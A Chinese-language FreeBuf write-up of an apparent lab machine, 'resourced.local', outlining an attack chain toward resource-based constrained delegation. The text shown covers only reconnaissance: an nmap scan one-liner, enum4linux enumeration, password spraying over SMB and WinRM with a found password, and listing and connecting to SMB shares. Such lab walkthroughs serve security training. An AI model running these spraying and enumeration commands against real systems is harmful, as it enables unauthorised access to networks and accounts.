FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

攻击链

信息收集---枚举用户信息，获得密码---收集SMB文件---从密码中提取hash值，密码爆破，获得新账户权限---收集域信息---进行基于资源的约束委派攻击，提权至Administrator账户

知识点

基于资源的约束委派攻击

过程

端口服务扫描

ports=$(nmap -p- --min-rate=1000  -T4 192.168.109.175 | grep ^[0-9] | cut -d

'/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -A  -p$ports 192.168.109.175  > n1.txt

所以这里我的做法是挨个做信息收集，如果开了80端口，那一定是优先看。因为一般不会白开。

全面枚举，简单高效。

enum4linux -a resourced.local

疑似密码的字符串，新雇佣的，注意密码！那就是这个用户名和密码对应。这个时候，有smb445，winrm5985均可尝试。执行密码喷洒，其实就应该是这个用户的密码，但也许其他用户可能会用相同的密码？

生成用户名字典：

nxc smb resourced.local -u users.txt -p 'HotelCalifornia194!' --continue-on-success

这个出货了。winrm试一下，

nxc winrm  resourced.local -u users.txt -p 'HotelCalifornia194!' --continue-on-success

winrm没有，那V.Ventz不在RM组里。连接SMB收集信息。先看有哪些文件夹及对应的权限。

crackmapexec smb  192.168.159.175   -u 'V.Ventz'  -p 'HotelCalifornia194!'  --shares

建立交互式连接

smbclient    \\\\192.168.159.175\\Password\ Audit -U 'V.Ventz%HotelCalifornia194!'

本文为 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）